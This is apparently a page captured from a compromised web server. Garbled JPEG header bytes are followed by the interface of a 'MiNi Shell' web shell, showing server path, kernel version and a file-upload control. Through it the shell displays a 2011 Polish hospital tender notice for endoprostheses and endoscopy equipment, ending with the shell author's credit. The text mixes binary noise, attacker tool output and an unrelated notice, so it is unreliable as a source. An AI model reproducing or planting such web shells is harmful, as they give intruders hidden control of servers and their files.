JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110303/35180-N-2011.html

<p class="kh_header"><b>Suwałki: dostawa  endoprotez cementowych, bezcementowych, połowicznych, panewki endoprotezy, sprzętu do badań endoskopowych   dla SPSW w Suwałkach - w pakietach I - III</b><br>
<b>Numer ogłoszenia: 35180 - 2011; data zamieszczenia: 03.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa  endoprotez cementowych, bezcementowych, połowicznych, panewki endoprotezy, sprzętu do badań endoskopowych   dla SPSW w Suwałkach - w pakietach I - III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa endoprotez cementowych, bezcementowych, połowicznych, panewki endoprotezy łącznie z użyczeniem instrumentariów do zakładania endoprotez;  sprzętu do badań ednoskopowych dla SPSW w Suwałkach  - ujętych w pakietach I - III  w asortymencie i w szacunkowej ilości określonych w załączniku nr  5 do SIWZ w okresie   12  miesięcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8, 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie wymaga się zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich  posiadania. W celu potwierdzenia  spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty: oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w oświadczeniu znajdujacym sie w druku oferty ząłacznik  nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:posiadania  wiedzy i doświadczenia. W celu potwierdzenia warunków udziału w postępowaniu Zamawiający wymaga dołacznia do oferty : oświadczenia o spełnieniu warunków udziału w postępowaniu  określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: dysponowania odpowiednim potencjałem oraz osobami zdolnymi do wykonania zamówienia. W celu potwierdzenia warunków udziału w postępowaniu Zamawiający wymaga dołacznia do oferty : oświadczenia o spełnieniu warunków udziału w postępowaniu  określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr  3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: sytuacji ekonomicznej i finansowej.   W celu potwierdzenia warunków udziału w postępowaniu Zamawiający wymaga dołacznia do oferty : oświadczenia o spełnieniu warunków udziału w postępowaniu  określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w SIWZ,Zamawiający wymaga dołączenia do oferty:

1)oświadczenia, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na podstawie     których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia w RP - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ 
2)   wypełnionego arkusza asortymentowo - cenowego dla pakietów nr I - III   (wzór stanowi załącznik nr 5 do SIWZ)
4)katalogu (prospektu)  w języku polskim, w którym został zaznaczony oferowany asortyment (pozycja z kodem) -  w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment. W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu zobowiązane są one do dołączenia do oferty tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu.
5) nieodpłatnie 1 kompletu próbek  endoprotez.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający może odstąpić od niniejszej umowy w trybie i na zasadach określonych w art. 145 PZP.
2. Zamawiający zgodnie z art. 144 ustawy Pzp przewiduję zmianę postanowień zawartej   umowy w stosunku do treści oferty tj.:
a) wydłużenia terminu realizacji umowy, o którym mowa w § 10 ust. 1 i projektu umowy, z chwilą niewykorzystania przez Zamawiającego wartości umowy, o której mowa w § 10ust. 1 niniejszej umowy;
b) zamiany poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy, z chwilą zaprzestania lub wstrzymania jego produkcji, a o czym Wykonawca nie mógł wiedzieć z chwilą zawarcia niniejszej umowy, na tzw. zamiennik pod warunkiem, że spełni on wszystkie wymogi Zamawiającego w tym również cenę jednostkową netto i brutto;
c) Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy w zakresie łącznej wartości umowy, o której mowa w § 1 ust. 1 projektu umowy.
        d)  numeru katalogowego produktu,
	- nazwy produktu przy zachowaniu jego parametrów,
	- sposobu konfekcjonowania,
	- liczby opakowań
	w sytuacji gdy:
	- wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany/udoskonalony
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.
3. Strony zgodnie ustalają, że w przypadku: 
	1) zmiany statusu prawnego Zamawiającego, 
	2) ograniczenia lub utraty istotnej części kontraktu z Narodowym Funduszem Zdrowia, 
	3) istotnego ograniczenia zakresu i ilości świadczonych usług zdrowotnych , 
	4) zmian organizacyjnych u Zamawiającego, 
     
rozwiązanie  zawartej   umowy  może  nastąpić  w  każdym  czasie  za  porozumieniem  stron  lub  w  drodze  miesięcznego jej wypowiedzenia, niezależnie od uprawnień wynikających z art. 145 PZP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital wojewódzki w Suwałkach, Dział Zamówień Publicznych, ul. Szpitalna 60, 16 -400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2011 godzina 09:30, miejsce: Kancelaria Samodzielngo Publicznego Szpitala Wojewódzkiego w Suwałkach, ul. Szpitalna 60, 16- 400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I - Endoprotezy cementowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET I - Endoprotezy cementowe
1. Endoprotezy cementowe stawu biodrowego: 	kpl.	20
1.1. trzpień - prosty z bocznymi skrzydełkami derotacyjnymi, chromowo - kobaltowy, eurostożek 12/14, bezkołnieżowy w minimum 5 rozmiarach, z offsetem rosnącym z każdymrozmiarem trzpienian szt. 20
1.2. centralizer - nakładany zgodnie z rozmiarem trzpienia	 szt. 20
1.3. główka 28mm - metalowa 28 w 5 długościach szyjki S, M, L, XL, XXL szt. 20
1.4. panewka - hemisferyczna polietylenowa z podwójnym pierścieniem metalowym do orientacji przestrzennej RTG, w rozmiarach od 42 do 62, w opcji na życzenie panewka hemisferyczna polietylenowa głęboka z podwójnym pierścieniem metalowym do orientacji przestrzennej RTG, w rozmiarach od 46 do 62mm szt.20
1.5. korek kaniulowany  wchłanialny / z mieszaniny żelatynowo - glicerynowo - wodnej / zgodny z rozmairem trzpienia	 szt. 20
2. Cement kostny / proszek i płyn w ampułce / o normlanej lepkości zmaknięty w strzykawce będącej jednocześnie integralnym mieszalnikiem cementu - opakowanie 60gram op. 25
3. Cement kostny do panewki o normlanej lepkości - opakowanie 20 gram op.25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET II - endoprotezy bezcementowe, połowicze, panewka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET II - endoprotezy bezcementowe, połowicze, panewka
1. Endoprotezy bezcementowe typu Bicontact	kpl. 30
1.1. trzpień - uniwersalny bezcementowy / taki sam do biodra prawego i lewego / Stożek 12/14. Wykonany ze stopu tytanu, w 1/3 części bliższej napylony czystym tytanem o porowatej strukturze. Kształt trzpienia płaski o przekroju prostokątnym. Skrzydełko derotacyjne zapobiegające przemieszczeniu się protezy. Otwór w części bliższej umożliwiający ewentualną ekstrakcję trzpienia. Rozmiary: min. 9 - 11 rozmiarów opcja trzpienia do bioder.	szt. 30
1.2. panewka - bezcementowa typu Screw Cup. Panweka ze stopu tytanu, powieerzchnia zewnętrzna napylona tytanem o porowatej strukturze, uniwersalna dla zastosowania wkładki polietylenowej i ceramicznej. Rozmiary od 40 do 68 mm (15 rozmiarów)	szt. 30
1.3. wkładka polietylenowa - kształt: symetryczna, asymetryczna lubposterior Wal. Materiał: wzmocniony polietylen odporny na scieranie. Rozmiary śred. Wewnętrzna: 22,2mm, 28mm, i 32mm	szt. 30
1.4. główka -  na stożek 12/14; 22,2; 28 i 32 mm o 5 długościach szyjki; opcjonalnie głowa na stożek 14/16 do zastosowań rewizyjnych	szt. 30
2. endoprotezy połowicze typu Austin Moor - każdy komplet endoprotezy połowiczej wykonany ze stopu tytanu. Dostępne w wersji standardowej i wąskiej. Śred. zewnętrzna 38 - 56 mm. Fabrycznie pakowana, sterylnie. Zaopatrzona w metryczkę do wklejenia dod okumentacji szpitalnej	kpl. 20
3. Panewka endoprotezy typu Biporal - główka bipolarna o średnicy wewnętrznej 22,2 mm oraz 28 i średnicach  zewnętrznych od 39 do 55 mm; wyposażona w pierścień zapobiegający zwichnięciom.  szt. 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET III - sprzęt do badań endoskopowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET III - sprzęt do badań endoskopowych
1. ustnik do gastroskopii standard, niejałowy, wielorazowy szt. 10
2. pętla do polipektomii owalna, niejałowa, wielorazowa w komplecie z osłoną, długość min. 230cm, średnica 7F szt.	10
3. rękojeść do pętli niejałowa, wielorazowa z pozycji 2	szt.2
4. kaniula do ECPW długość min. 195cm, średnica 2,2mm, niejałowa, wielorazowa	szt.	6
5. sfinkterotom jałowy, wielorazowy średnica 6F, długość 200 cm, nosek długości 35mm, cięciwa długości 30mm op=2szt.m szt. 10
6. zestaw do ostrzykiwania kolonoskopowy wielokrotnego użytku: 1 metalowa osłonka wielorazowa, średnica 2,8mm, długość 230 cm, komplet teflonowych igieł z ostrzem 4mm i średnicy 0,6mm szt. 2
7. zestaw do ostrzykiwania gastroskopowy wielokrotnego użytku: 1 metalowa sołona wielorazowa, średnica 2,8mm, długość 160 cm, komplet teflonowych igieł z ostrzem 4mm i średnicy 0,6mm szt.	2
8. kleszczyki do biopsji gastroskopowe, niejałowe, wielorazowe, długość min. 155cm, średnica 2,8mm	szt.	10
9. kleszczyki do biopsji kolonoskopowe, niejałowe, wielorazowe, długość min. 230cm, średnica 2,8mm	szt.	10
10. klips standard clip do klipsownicy model HX-610-135 firmy Olimpus - bedącym na wyposażeniu szpitala - op=40szt.	op.  1
11. szczoteczka do czyszczenia endoskopu niejałowa, wielorazowa (standard) - kanał roboczy - długość 230 cm, średnica 2,8mm szt. 6
12. szczoteczka do czyszczenia endoskopu niejałowa, wielorazowa - kanała powietrze - woda, do kolonoskopu EC-38885FK2 firmy PENTAX - długośc 250cm, srednica 1,2mm (będącego na wysposażeniu szpitala)	szt. 	6
13. szczoteczka do czyszczenia endoskopu niejałowa, wielorazowa - kanał powietrze - woda, do duodenoskop ED-530XT8 symbol FT WB 2221FW2 (będącego na wyposażeniu szpitala)	szt.	15
14. eletroda argonowa giętka niejałowa, wielorazowa / do aparatu eletrochirurgicznego z modułem argonowym firmy EMED -Es 350( będącym na wyposażeniu szpitala) ; ługość 220 cm, średnica 2,3mm	szt.	3
15. olej silikonowy do ruchomych elementów endoskopów	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com